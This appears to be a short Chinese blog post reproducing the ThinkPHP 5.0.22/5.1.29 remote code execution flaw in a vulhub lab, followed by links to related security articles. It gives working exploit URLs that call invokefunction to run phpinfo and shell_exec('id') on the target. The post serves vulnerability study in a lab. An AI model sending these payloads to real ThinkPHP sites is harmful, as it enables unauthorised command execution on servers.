vulhub中ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞复现

ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。

1.环境启动后,访问http://your-ip:8080即可看到ThinkPHP默认启动页面。

2.直接访问http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1,即可执行phpinfo:

复制代码
http://192.168.188.139:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=id
相关推荐
jun~5 小时前
SQLMap数据库枚举靶机(打靶记录)
linux·数据库·笔记·学习·安全·web安全
伊织code6 小时前
Cybersecurity AI (CAI) - 轻量级网络安全AI框架
人工智能·安全·web安全·cybersecurity·cai
黄焖鸡能干四碗8 小时前
企业信息化建设总体规划设计方案
大数据·运维·数据库·人工智能·web安全
余防9 小时前
文件上传漏洞(二)iis6.0 CGI漏洞
前端·安全·web安全·网络安全
PyHaVolask16 小时前
渗透测试入门:从网络抓包到Web安全基础
网络·web安全·http协议·网络抓包
PyHaVolask17 小时前
从PHP入门到公网部署:Web开发与服务器运维实战指南
web安全·php开发·http协议·服务器部署
鸠摩智首席音效师1 天前
Nginx 如何启用 HSTS 以加强网络安全 ?
运维·nginx·web安全
Suckerbin1 天前
burpsuite网络安全学院: JWT attacks靶场通关
网络·笔记·安全·web安全·网络安全
weixin_446260851 天前
解锁安全新维度:Cybersecurity AI (CAI) 助力提升网络安全效率!
人工智能·安全·web安全
熙客1 天前
Session与JWT安全对比
java·分布式·安全·web安全·spring cloud